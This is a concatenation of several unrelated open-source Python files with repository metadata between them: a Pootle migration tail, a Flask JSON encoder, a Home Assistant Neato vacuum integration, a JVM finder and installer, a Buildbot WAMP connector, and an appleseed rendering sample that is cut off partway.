SubmissionTypes.SYSTEM
if user == get_system_user_id()
else SubmissionTypes.WEB),
reviewed_by_id=user,
reviewed_on=timestamp)
Batch(unit_changes).create(values, _create_method)
def set_change_reviewed(apps, schema_editor):
units = apps.get_model("pootle_store.Unit").objects.all()
unit_changes = apps.get_model("pootle_store.UnitChange").objects.all()
_update_reviewed(
units.filter(
change__isnull=False).filter(reviewed_by__isnull=False),
unit_changes)
_add_reviewed(
units.filter(
change__isnull=True).filter(reviewed_by__isnull=False),
unit_changes)
class Migration(migrations.Migration):
dependencies = [
('pootle_store', '0049_remove_unit_commented'),
]
operations = [
migrations.RunPython(set_change_reviewed),
]
| gpl-3.0 | -9,012,708,686,653,003,000 | 29.535714 | 74 | 0.638596 | false |
indico/indico-mobile | indicomobile/util/json.py | 1 | 1259 | import datetime
from pytz import utc, timezone
from flask import json, current_app
from flask.ext.mongokit import Document
from bson import ObjectId, DBRef
PATCHED = False
class _JSONEncoder(json.JSONEncoder):
def default(self, obj):
app_tz = timezone(current_app.config.get('TIMEZONE', 'UTC'))
if isinstance(obj, Document):
return obj.fields()
elif isinstance(obj, datetime.datetime):
return {
'date': utc.localize(obj).astimezone(app_tz).strftime('%Y-%m-%d'),
'time': utc.localize(obj).astimezone(app_tz).strftime('%H:%M:%S'),
'tz': utc.localize(obj).astimezone(app_tz).strftime('%Z')
}
elif isinstance(obj, ObjectId):
return getattr(obj, 'id', None)
elif isinstance(obj, DBRef):
return None
return json.JSONEncoder.default(self, obj)
_old_dumps = json.dumps
def patch_json():
"""
Monkey-patch default JSON lib as to allow serializing MongoKit objs
"""
global PATCHED
if PATCHED:
return
def _json_dumps(*args, **kwargs):
kwargs['cls'] = _JSONEncoder
return _old_dumps(*args, **kwargs)
json.dumps = _json_dumps
PATCHED = True
| gpl-3.0 | -8,738,935,069,041,526,000 | 25.787234 | 82 | 0.603654 | false |
w1ll1am23/home-assistant | homeassistant/components/neato/vacuum.py | 1 | 14227 | """Support for Neato Connected Vacuums."""
from datetime import timedelta
import logging
from pybotvac.exceptions import NeatoRobotException
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_STATUS,
STATE_CLEANING,
STATE_DOCKED,
STATE_ERROR,
STATE_IDLE,
STATE_PAUSED,
STATE_RETURNING,
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_LOCATE,
SUPPORT_MAP,
SUPPORT_PAUSE,
SUPPORT_RETURN_HOME,
SUPPORT_START,
SUPPORT_STATE,
SUPPORT_STOP,
StateVacuumEntity,
)
from homeassistant.const import ATTR_MODE
from homeassistant.helpers import config_validation as cv, entity_platform
from .const import (
ACTION,
ALERTS,
ERRORS,
MODE,
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_PERSISTENT_MAPS,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
SUPPORT_NEATO = (
SUPPORT_BATTERY
| SUPPORT_PAUSE
| SUPPORT_RETURN_HOME
| SUPPORT_STOP
| SUPPORT_START
| SUPPORT_CLEAN_SPOT
| SUPPORT_STATE
| SUPPORT_MAP
| SUPPORT_LOCATE
)
ATTR_CLEAN_START = "clean_start"
ATTR_CLEAN_STOP = "clean_stop"
ATTR_CLEAN_AREA = "clean_area"
ATTR_CLEAN_BATTERY_START = "battery_level_at_clean_start"
ATTR_CLEAN_BATTERY_END = "battery_level_at_clean_end"
ATTR_CLEAN_SUSP_COUNT = "clean_suspension_count"
ATTR_CLEAN_SUSP_TIME = "clean_suspension_time"
ATTR_CLEAN_PAUSE_TIME = "clean_pause_time"
ATTR_CLEAN_ERROR_TIME = "clean_error_time"
ATTR_LAUNCHED_FROM = "launched_from"
ATTR_NAVIGATION = "navigation"
ATTR_CATEGORY = "category"
ATTR_ZONE = "zone"
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Neato vacuum with config entry."""
dev = []
neato = hass.data.get(NEATO_LOGIN)
mapdata = hass.data.get(NEATO_MAP_DATA)
persistent_maps = hass.data.get(NEATO_PERSISTENT_MAPS)
for robot in hass.data[NEATO_ROBOTS]:
dev.append(NeatoConnectedVacuum(neato, robot, mapdata, persistent_maps))
if not dev:
return
_LOGGER.debug("Adding vacuums %s", dev)
async_add_entities(dev, True)
platform = entity_platform.current_platform.get()
assert platform is not None
platform.async_register_entity_service(
"custom_cleaning",
{
vol.Optional(ATTR_MODE, default=2): cv.positive_int,
vol.Optional(ATTR_NAVIGATION, default=1): cv.positive_int,
vol.Optional(ATTR_CATEGORY, default=4): cv.positive_int,
vol.Optional(ATTR_ZONE): cv.string,
},
"neato_custom_cleaning",
)
class NeatoConnectedVacuum(StateVacuumEntity):
"""Representation of a Neato Connected Vacuum."""
def __init__(self, neato, robot, mapdata, persistent_maps):
"""Initialize the Neato Connected Vacuum."""
self.robot = robot
self._available = neato is not None
self._mapdata = mapdata
self._name = f"{self.robot.name}"
self._robot_has_map = self.robot.has_persistent_maps
self._robot_maps = persistent_maps
self._robot_serial = self.robot.serial
self._status_state = None
self._clean_state = None
self._state = None
self._clean_time_start = None
self._clean_time_stop = None
self._clean_area = None
self._clean_battery_start = None
self._clean_battery_end = None
self._clean_susp_charge_count = None
self._clean_susp_time = None
self._clean_pause_time = None
self._clean_error_time = None
self._launched_from = None
self._battery_level = None
self._robot_boundaries = []
self._robot_stats = None
def update(self):
"""Update the states of Neato Vacuums."""
_LOGGER.debug("Running Neato Vacuums update for '%s'", self.entity_id)
try:
if self._robot_stats is None:
self._robot_stats = self.robot.get_general_info().json().get("data")
except NeatoRobotException:
_LOGGER.warning("Couldn't fetch robot information of %s", self.entity_id)
try:
self._state = self.robot.state
except NeatoRobotException as ex:
if self._available: # print only once when available
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
self._state = None
self._available = False
return
self._available = True
_LOGGER.debug("self._state=%s", self._state)
if "alert" in self._state:
robot_alert = ALERTS.get(self._state["alert"])
else:
robot_alert = None
if self._state["state"] == 1:
if self._state["details"]["isCharging"]:
self._clean_state = STATE_DOCKED
self._status_state = "Charging"
elif (
self._state["details"]["isDocked"]
and not self._state["details"]["isCharging"]
):
self._clean_state = STATE_DOCKED
self._status_state = "Docked"
else:
self._clean_state = STATE_IDLE
self._status_state = "Stopped"
if robot_alert is not None:
self._status_state = robot_alert
elif self._state["state"] == 2:
if robot_alert is None:
self._clean_state = STATE_CLEANING
self._status_state = (
f"{MODE.get(self._state['cleaning']['mode'])} "
f"{ACTION.get(self._state['action'])}"
)
if (
"boundary" in self._state["cleaning"]
and "name" in self._state["cleaning"]["boundary"]
):
self._status_state += (
f" {self._state['cleaning']['boundary']['name']}"
)
else:
self._status_state = robot_alert
elif self._state["state"] == 3:
self._clean_state = STATE_PAUSED
self._status_state = "Paused"
elif self._state["state"] == 4:
self._clean_state = STATE_ERROR
self._status_state = ERRORS.get(self._state["error"])
self._battery_level = self._state["details"]["charge"]
if not self._mapdata.get(self._robot_serial, {}).get("maps", []):
return
mapdata = self._mapdata[self._robot_serial]["maps"][0]
self._clean_time_start = mapdata["start_at"]
self._clean_time_stop = mapdata["end_at"]
self._clean_area = mapdata["cleaned_area"]
self._clean_susp_charge_count = mapdata["suspended_cleaning_charging_count"]
self._clean_susp_time = mapdata["time_in_suspended_cleaning"]
self._clean_pause_time = mapdata["time_in_pause"]
self._clean_error_time = mapdata["time_in_error"]
self._clean_battery_start = mapdata["run_charge_at_start"]
self._clean_battery_end = mapdata["run_charge_at_end"]
self._launched_from = mapdata["launched_from"]
if (
self._robot_has_map
and self._state["availableServices"]["maps"] != "basic-1"
and self._robot_maps[self._robot_serial]
):
allmaps = self._robot_maps[self._robot_serial]
_LOGGER.debug(
"Found the following maps for '%s': %s", self.entity_id, allmaps
)
self._robot_boundaries = [] # Reset boundaries before refreshing boundaries
for maps in allmaps:
try:
robot_boundaries = self.robot.get_map_boundaries(maps["id"]).json()
except NeatoRobotException as ex:
_LOGGER.error(
"Could not fetch map boundaries for '%s': %s",
self.entity_id,
ex,
)
return
_LOGGER.debug(
"Boundaries for robot '%s' in map '%s': %s",
self.entity_id,
maps["name"],
robot_boundaries,
)
if "boundaries" in robot_boundaries["data"]:
self._robot_boundaries += robot_boundaries["data"]["boundaries"]
_LOGGER.debug(
"List of boundaries for '%s': %s",
self.entity_id,
self._robot_boundaries,
)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_NEATO
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
return self._battery_level
@property
def available(self):
"""Return if the robot is available."""
return self._available
@property
def icon(self):
"""Return neato specific icon."""
return "mdi:robot-vacuum-variant"
@property
def state(self):
"""Return the status of the vacuum cleaner."""
return self._clean_state
@property
def unique_id(self):
"""Return a unique ID."""
return self._robot_serial
@property
def extra_state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self._status_state is not None:
data[ATTR_STATUS] = self._status_state
if self._clean_time_start is not None:
data[ATTR_CLEAN_START] = self._clean_time_start
if self._clean_time_stop is not None:
data[ATTR_CLEAN_STOP] = self._clean_time_stop
if self._clean_area is not None:
data[ATTR_CLEAN_AREA] = self._clean_area
if self._clean_susp_charge_count is not None:
data[ATTR_CLEAN_SUSP_COUNT] = self._clean_susp_charge_count
if self._clean_susp_time is not None:
data[ATTR_CLEAN_SUSP_TIME] = self._clean_susp_time
if self._clean_pause_time is not None:
data[ATTR_CLEAN_PAUSE_TIME] = self._clean_pause_time
if self._clean_error_time is not None:
data[ATTR_CLEAN_ERROR_TIME] = self._clean_error_time
if self._clean_battery_start is not None:
data[ATTR_CLEAN_BATTERY_START] = self._clean_battery_start
if self._clean_battery_end is not None:
data[ATTR_CLEAN_BATTERY_END] = self._clean_battery_end
if self._launched_from is not None:
data[ATTR_LAUNCHED_FROM] = self._launched_from
return data
@property
def device_info(self):
"""Device info for neato robot."""
info = {"identifiers": {(NEATO_DOMAIN, self._robot_serial)}, "name": self._name}
if self._robot_stats:
info["manufacturer"] = self._robot_stats["battery"]["vendor"]
info["model"] = self._robot_stats["model"]
info["sw_version"] = self._robot_stats["firmware"]
return info
def start(self):
"""Start cleaning or resume cleaning."""
try:
if self._state["state"] == 1:
self.robot.start_cleaning()
elif self._state["state"] == 3:
self.robot.resume_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def pause(self):
"""Pause the vacuum."""
try:
self.robot.pause_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
try:
if self._clean_state == STATE_CLEANING:
self.robot.pause_cleaning()
self._clean_state = STATE_RETURNING
self.robot.send_to_base()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
try:
self.robot.stop_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def locate(self, **kwargs):
"""Locate the robot by making it emit a sound."""
try:
self.robot.locate()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def clean_spot(self, **kwargs):
"""Run a spot cleaning starting from the base."""
try:
self.robot.start_spot_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def neato_custom_cleaning(self, mode, navigation, category, zone=None):
"""Zone cleaning service call."""
boundary_id = None
if zone is not None:
for boundary in self._robot_boundaries:
if zone in boundary["name"]:
boundary_id = boundary["id"]
if boundary_id is None:
_LOGGER.error(
"Zone '%s' was not found for the robot '%s'", zone, self.entity_id
)
return
_LOGGER.info("Start cleaning zone '%s' with robot %s", zone, self.entity_id)
self._clean_state = STATE_CLEANING
try:
self.robot.start_cleaning(mode, navigation, category, boundary_id)
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
| apache-2.0 | -2,330,766,307,765,658,000 | 34.041872 | 88 | 0.560905 | false |
phihag/jippy | jippy/_jvm.py | 1 | 8204 |
import ctypes
import hashlib
import io
import platform
import os
import sys
import tarfile
import tempfile
import threading
from . import _util
from ._jvm_intf import *
_JVM_DOWNLOAD_URL = 'http://www.java.com/en/download/manual.jsp?locale=en'
# Mapping from Python architecture (platform.machine() to Java's)
_JAVA_ARCH = {
'x86_64': 'amd64',
}
NO_CACHE = False
JVM_LOCROOT_SYSTEM = '/usr/share/jippy/jvms/'
JVM_LOCROOT_USER = os.path.expanduser('~/.local/share/jippy/jvms/')
DEFAULT_CACHE_DIR = os.path.expanduser('~/.local/share/jippy/downloads/')
class NoJVMFoundError(RuntimeError):
pass
class JVMError(BaseException):
pass
def _listall(path):
try:
for fn in os.listdir(path):
yield os.path.join(path, fn)
except OSError: # File not there or inaccessible, ignore
return
def _list_jvm_candidates_roots():
""" Yield all candidates for a JVM """
if 'JAVA_HOME' in os.environ:
yield os.environ['JAVA_HOME']
# No yield from for backwards compatibility
platName = sys.platform + '-' + platform.machine()
for c in _listall(os.path.join(JVM_LOCROOT_USER, platName)):
yield c
for c in _listall(os.path.join(JVM_LOCROOT_SYSTEM, platName)):
yield c
yield os.path.dirname(os.path.abspath(os.readlink('/usr/bin/java')))
for c in _listall('/usr/lib/jvm'):
yield c
def _list_jvm_locations():
for root in _list_jvm_candidates_roots():
if is_jvm_location(root):
yield root
def _find_libjvm_so(loc):
java_arch = _JAVA_ARCH.get(platform.machine())
subdirs = [
os.path.join('jre', 'lib', java_arch, 'server'), # OpenJDK on debian
'lib', # Sun JRE on debian
os.path.join('lib', java_arch, 'server'), # Oracle JDK on Linux
os.path.curdir, # Full location
]
for subdir in subdirs:
fn = os.path.join(loc, subdir, 'libjvm.so')
if os.path.isfile(fn):
return fn
return None
def is_jvm_location(loc):
return _find_libjvm_so(loc) is not None
def find_jvm_location(locations=None, auto_install=False):
"""
Find a JVM on the system.
If auto_install is set, automatically download and install a JVM if none is
present (may take a while)
"""
if not locations:
locations = _list_jvm_locations()
try:
return next(locations)
except IndexError:
if auto_install:
return install_jvm()
else:
raise NoJVMFoundError()
def install_jvm(loc_root=JVM_LOCROOT_USER, cache_dir=None):
"""
Download and install a JVM into the specified location root.
Return the actual location.
cache_dir specifies the location of the directory where the large downloads
(not the index) is cached. Set to NO_CACHE to disable caching.
"""
import urllib
import re
if cache_dir is None:
cache_dir = DEFAULT_CACHE_DIR
dlp = urllib.urlopen(_JVM_DOWNLOAD_URL)
try:
dlPage = dlp.read()
finally:
dlp.close()
def _findLink(linkText):
m = re.match(r'.*?<a title="' + re.escape(linkText) + '" href="([^"]+)"', dlPage, re.DOTALL)
if not m:
raise ValueError('Cannot find specified link text ' + repr(linkText) + ' in JVM download page')
return m.group(1)
def _downloadFile(url):
""" Returns a bytes object of the downloaded url """
if cache_dir != NO_CACHE:
cacheId = hashlib.sha512(url.encode('utf-8')).hexdigest()
cacheFn = os.path.join(cache_dir, cacheId)
try:
with open(cacheFn, 'rb') as cacheFile:
return cacheFile.read()
except IOError:
pass # Cache file not present, download
dl = urllib.urlopen(url)
try:
content = dl.read()
finally:
dl.close()
if cache_dir != NO_CACHE:
try:
_util.makedirs(cache_dir)
with tempfile.NamedTemporaryFile(dir=cache_dir, prefix='jvm_cache_' + cacheId, delete=False) as tf:
tf.write(content)
# atomic - the cache file should always be of full size
os.rename(tf.name, cacheFn)
except IOError:
pass # Creation of cache file failed, but that's not that important
return content
if sys.platform == 'linux2':
if platform.machine() == 'i386':
url = _findLink(' Download Java software for Linux')
elif platform.machine() == 'x86_64':
url = _findLink(' Download Java software for Linux x64')
else:
raise NotImplementedError('JVM installation not yet implemented for ' + sys.platform + ' / ' + platform.machine())
content = _downloadFile(url)
with tarfile.open('r:gz', fileobj=io.BytesIO(content)) as tf:
platf = sys.platform + '-' + platform.machine()
vname = next(n for n in tf.getnames() if '/' not in n)
jvmDir = os.path.join(loc_root, platf)
_util.extractall_safely(tf, jvmDir)
path = os.path.join(jvmDir, vname)
else:
raise NotImplementedError('JVM installation not yet implemented for ' +
sys.platform)
return path
class JVM(object):
# For details on the inner workings, see
# http://docs.oracle.com/javase/1.5.0/docs/guide/jni/spec/invocation.html
def __init__(self, path=None, autostart=True, auto_install=None):
if path is None:
path = find_jvm_location(auto_install=auto_install)
self._path = path
self._autostart = autostart
@property
def started(self):
return hasattr(self, '_dll')
def start(self):
"""
Start running the current JVM in the current process.
Note that current JVM implementations support only one JVM per process.
"""
self._dllPath = _find_libjvm_so(self._path)
if self._dllPath is None:
raise OSError('Cannot find JVM in specified path. '
'Call find_jvm_location(..., auto_install=True) to download one.')
self._dll = ctypes.cdll.LoadLibrary(self._dllPath)
jvm = JavaVM()
env = JNIEnv()
vm_args = _JavaVMInitArgs()
vm_args.version = 0x00010002
res = self._dll.JNI_GetDefaultJavaVMInitArgs(ctypes.pointer(vm_args))
if res != 0:
raise JVMError('JVM is too old, update to 1.2+')
self._dll.JNI_CreateJavaVM(
#(&jvm, &env, ctypes.pointer(vm_args)
)
#self._dll.
# TODO boot em up
def call(self, name, **args):
if not self.started and self._autostart:
self.start()
assert self.started
# TODO attach thread if necessary
# TODO actually call
# TODO handle result
def matches_spec(self, spec):
if spec.get('path'):
if spec.get('path') != self._path:
return False
# autostart is ignored
return True
_singleton_jvm_data = {
'jvm': None,
'lock': threading.Lock(),
}
def jvm(jvmSpec={}, auto_install=None):
"""
Return a singleton JVM.
Since virtually all JVM implementations only support one VM per process,
that's all we can do.
jvmSpec defines the requirements for the JVM. Current supported keys are:
path - The location of the JVM in the file system
Set auto_install to download and install a JVM if none is found.
"""
with _singleton_jvm_data['lock']:
if _singleton_jvm_data['jvm']:
if not _singleton_jvm_data['jvm'].matches_spec(jvmSpec):
raise Exception('Java VM already started, but it does not conform to requested specs')
else:
_singleton_jvm_data['jvm'] = JVM(auto_install=auto_install,
**jvmSpec)
return _singleton_jvm_data['jvm']
__all__ = ['JVM_LOCROOT_SYSTEM', 'JVM_LOCROOT_USER', 'NO_CACHE',
'is_jvm_location', 'install_jvm', 'jvm']
| apache-2.0 | 4,436,772,552,041,946,000 | 32.622951 | 126 | 0.5902 | false |
Lekensteyn/buildbot | master/buildbot/wamp/connector.py | 2 | 5738 | # This file is part of . Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Team Members
from __future__ import absolute_import
from __future__ import print_function
import txaio
from autobahn.twisted.wamp import ApplicationSession
from autobahn.twisted.wamp import Service
from autobahn.wamp.exception import TransportLost
from twisted.internet import defer
from twisted.python import failure
from twisted.python import log
from buildbot.util import ascii2unicode
from buildbot.util import service
class MasterService(ApplicationSession, service.AsyncMultiService):
"""
concatenation of all the wamp services of buildbot
"""
def __init__(self, config):
ApplicationSession.__init__(self)
service.AsyncMultiService.__init__(self)
self.config = config
self.leaving = False
self.setServiceParent(config.extra['parent'])
@defer.inlineCallbacks
def onJoin(self, details):
log.msg("Wamp connection succeed!")
for handler in [self] + self.services:
yield self.register(handler)
yield self.subscribe(handler)
yield self.publish(u"org.buildbot.%s.connected" % (self.master.masterid))
self.parent.service = self
self.parent.serviceDeferred.callback(self)
@defer.inlineCallbacks
def onLeave(self, details):
if self.leaving:
return
# XXX We don't handle crossbar reboot, or any other disconnection well.
# this is a tricky problem, as we would have to reconnect with exponential backoff
# re-subscribe to subscriptions, queue messages until reconnection.
# This is quite complicated, and I believe much better handled in autobahn
# It is possible that such failure is practically non-existent
# so for now, we just crash the master
log.msg("Guru meditation! We have been disconnected from wamp server")
log.msg(
"We don't know how to recover this without restarting the whole system")
log.msg(str(details))
yield self.master.stopService()
def onUserError(self, e, msg):
log.err(e, msg)
def make(config):
if config:
return MasterService(config)
else:
# if no config given, return a description of this WAMPlet ..
return {'label': 'Buildbot master wamplet',
'description': 'This contains all the wamp methods provided by a buildbot master'}
class WampConnector(service.ReconfigurableServiceMixin, service.AsyncMultiService):
serviceClass = Service
name = "wamp"
def __init__(self):
service.AsyncMultiService.__init__(self)
self.app = self.router_url = None
self.serviceDeferred = defer.Deferred()
self.service = None
def getService(self):
if self.service is not None:
return defer.succeed(self.service)
d = defer.Deferred()
@self.serviceDeferred.addCallback
def gotService(service):
d.callback(service)
return service
return d
def stopService(self):
if self.service is not None:
self.service.leaving = True
service.AsyncMultiService.stopService(self)
@defer.inlineCallbacks
def publish(self, topic, data, options=None):
service = yield self.getService()
try:
ret = yield service.publish(topic, data, options=options)
except TransportLost:
log.err(failure.Failure(), "while publishing event " + topic)
return
defer.returnValue(ret)
@defer.inlineCallbacks
def subscribe(self, callback, topic=None, options=None):
service = yield self.getService()
ret = yield service.subscribe(callback, topic, options)
defer.returnValue(ret)
@defer.inlineCallbacks
def reconfigServiceWithBuildbotConfig(self, new_config):
if new_config.mq.get('type', 'simple') != "wamp":
return
wamp = new_config.mq
log.msg("Starting wamp with config: %r", wamp)
router_url = wamp.get('router_url', None)
# This is not a good idea to allow people to switch the router via reconfig
# how would we continue the current transactions ?
# how would we tell the workers to switch router ?
if self.app is not None and self.router_url != router_url:
raise ValueError(
"Cannot use different wamp router url when reconfiguring")
if router_url is None:
return
self.router_url = router_url
self.app = self.serviceClass(
url=self.router_url,
extra=dict(master=self.master, parent=self),
realm=ascii2unicode(wamp.get('realm', 'buildbot')),
make=make
)
wamp_debug_level = wamp.get('wamp_debug_level', 'error')
txaio.set_global_log_level(wamp_debug_level)
yield self.app.setServiceParent(self)
yield service.ReconfigurableServiceMixin.reconfigServiceWithBuildbotConfig(self,
new_config)
| gpl-2.0 | -304,806,555,623,238,000 | 36.25974 | 98 | 0.65894 | false |
Vertexwahn/appleseed | sandbox/samples/python/basic/basic.py | 1 | 11092 |
#
# This source file is part of appleseed.
# Visit http://appleseedhq.net/ for additional information and resources.
#
# This software is released under the MIT license.
#
# Copyright (c) 2012-2013 Esteban Tovagliari, Jupiter Jazz Limited
# Copyright (c) 2014-2015 Esteban Tovagliari, The appleseedhq Organization
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import math
import signal
import sys
import time
import threading
import appleseed as asr
def build_project():
# Create an empty project.
project = asr.Project('test project')
paths = project.get_search_paths()
paths.append('data')
project.set_search_paths(paths)
# Add default configurations to the project.
project.add_default_configurations()
# Set the number of samples. This is basically the quality parameter: the higher the number
# of samples, the smoother the image but the longer the rendering time.
# todo: fix.
conf = project.configurations()['final']
params = {'uniform_pixel_renderer' : {'samples' : 25}}
# Create a scene.
scene = asr.Scene()
# Create an assembly.
assembly = asr.Assembly("assembly")
#------------------------------------------------------------------------
# Materials
#------------------------------------------------------------------------
# Create a color called "gray" and insert it into the assembly.
GrayReflectance = [0.5, 0.5, 0.5]
assembly.colors().insert(asr.ColorEntity("gray", { 'color_space' : 'srgb' }, GrayReflectance))
# Create a BRDF called "diffuse_gray_brdf" and insert it into the assembly.
assembly.bsdfs().insert(asr.BSDF("lambertian_brdf", "diffuse_gray_brdf", { 'reflectance' : 'gray' }))
# Create a physical surface shader and insert it into the assembly.
assembly.surface_shaders().insert(asr.SurfaceShader("physical_surface_shader", "physical_surface_shader"))
# Create a material called "gray_material" and insert it into the assembly.
assembly.materials().insert(asr.Material("gray_material", { "surface_shader" : "physical_surface_shader",
"bsdf" : "diffuse_gray_brdf" }))
#------------------------------------------------------------------------
# Geometry
#------------------------------------------------------------------------
# Load the scene geometry from disk.
objects = asr.MeshObjectReader.read(project.get_search_paths(), "cube", { 'filename' : 'scene.obj' })
# Insert all the objects into the assembly.
for object in objects:
# Create an instance of this object and insert it into the assembly.
instance_name = object.get_name() + "_inst"
material_names = { "default" : "gray_material", "default2" : "gray_material" }
instance = asr.ObjectInstance(instance_name, {}, object.get_name(), asr.Transformd(asr.Matrix4d.identity()), material_names)
assembly.object_instances().insert(instance)
# Insert this object into the scene.
assembly.objects().insert(object)
#------------------------------------------------------------------------
# Light
#------------------------------------------------------------------------
# Create a color called "light_intensity" and insert it into the assembly.
LightRadiance = [1.0, 1.0, 1.0]
assembly.colors().insert(asr.ColorEntity("light_intensity", { 'color_space' : 'srgb', 'multiplier' : 30.0 }, LightRadiance))
# Create a point light called "light" and insert it into the assembly.
light = asr.Light("point_light", "light", { 'intensity' : 'light_intensity' })
light.set_transform(asr.Transformd(asr.Matrix4d.translation(asr.Vector3d(0.6, 2.0, 1.0))))
assembly.lights().insert(light)
# Create an instance of the assembly and insert it into the scene.
assembly_inst = asr.AssemblyInstance("assembly_inst", {}, assembly.get_name())
assembly_inst.transform_sequence().set_transform(0.0, asr.Transformd(asr.Matrix4d.identity()))
scene.assembly_instances().insert(assembly_inst)
# Insert the assembly into the scene.
scene.assemblies().insert(assembly)
#------------------------------------------------------------------------
# Environment
#------------------------------------------------------------------------
# Create a color called "sky_radiance" and insert it into the scene.
SkyRadiance = [0.75, 0.80, 1.0]
scene.colors().insert(asr.ColorEntity("sky_radiance", { 'color_space' : 'srgb', 'multiplier' : 0.5 }, SkyRadiance))
# Create an environment EDF called "sky_edf" and insert it into the scene.
scene.environment_edfs().insert(asr.EnvironmentEDF("constant_environment_edf", "sky_edf", { 'radiance' : 'sky_radiance' }))
# Create an environment shader called "sky_shader" and insert it into the scene.
scene.environment_shaders().insert(asr.EnvironmentShader("edf_environment_shader", "sky_shader", { 'environment_edf' : 'sky_edf' }))
# Create an environment called "sky" and bind it to the scene.
scene.set_environment(asr.Environment("sky", { "environment_edf" : "sky_edf", "environment_shader" : "sky_shader" }))
#------------------------------------------------------------------------
# Camera
#------------------------------------------------------------------------
# Create a pinhole camera with film dimensions 0.980 x 0.735 in (24.892 x 18.669 mm).
params = { 'film_dimensions' : asr.Vector2f(0.024892, 0.018669), 'focal_length' : 0.035 }
camera = asr.Camera("pinhole_camera", "camera", params)
# Place and orient the camera. By default cameras are located in (0.0, 0.0, 0.0)
# and are looking toward Z- (0.0, 0.0, -1.0).
mat = asr.Matrix4d.rotation(asr.Vector3d(1.0, 0.0, 0.0), math.radians(-20.0))
mat = mat * asr.Matrix4d.translation(asr.Vector3d(0.0, 0.8, 11.0))
camera.transform_sequence().set_transform(0.0, asr.Transformd(mat))
# Bind the camera to the scene.
scene.set_camera(camera)
#------------------------------------------------------------------------
# Frame
#------------------------------------------------------------------------
# Create a frame and bind it to the project.
params = { 'camera' : scene.get_camera().get_name(),
'resolution' : asr.Vector2i(640, 480),
'color_space' : 'srgb' }
project.set_frame(asr.Frame("beauty", params))
# Bind the scene to the project.
project.set_scene(scene)
return project
class RendererController(asr.IRendererController):
def __init__(self):
super(RendererController, self).__init__()
self.__abort = False
def abort_rendering(self):
sys.stdout.write("Aborting rendering\n")
sys.stdout.flush()
self.__abort = True
# This method is called before rendering begins.
def on_rendering_begin(self):
pass
# This method is called after rendering has succeeded.
def on_rendering_success(self):
pass
# This method is called after rendering was aborted.
def on_rendering_abort(self):
pass
# This method is called before rendering a single frame.
def on_frame_begin(self):
pass
# This method is called after rendering a single frame.
def on_frame_end(self):
pass
# This method is called continuously during rendering.
def on_progress(self):
pass
# Return the current rendering status.
def get_status(self):
if self.__abort:
return asr.IRenderControllerStatus.AbortRendering
else:
return asr.IRenderControllerStatus.ContinueRendering
class TileCallback(asr.ITileCallback):
def __init__(self):
super(TileCallback, self).__init__()
# This method is called before a region is rendered.
def pre_render(self, x, y, width, height):
pass
# This method is called after a tile is rendered.
def post_render_tile(self, frame, tile_x, tile_y):
sys.stdout.write('.')
# This method is called after a whole frame is rendered.
def post_render(self, frame):
pass
class RenderThread(threading.Thread):
def __init__(self, renderer):
super(RenderThread, self).__init__()
self.__renderer = renderer
def run(self):
self.__renderer.render()
RENDER_ON_THREAD = True
def main():
# Create a log target that outputs to stderr, and binds it to the renderer's global logger.
# Eventually you will want to redirect log messages to your own target.
# For this you will need to subclass appleseed.ILogTarget.
log_target = asr.ConsoleLogTarget(sys.stderr)
# It is important to keep log_target alive, as the global logger does not
# take ownership of it. In this example, we do that by removing the log target
# when no longer needed, at the end of this function.
asr.global_logger().add_target(log_target)
# Build the project.
project = build_project()
# Create the master renderer.
renderer_controller = RendererController()
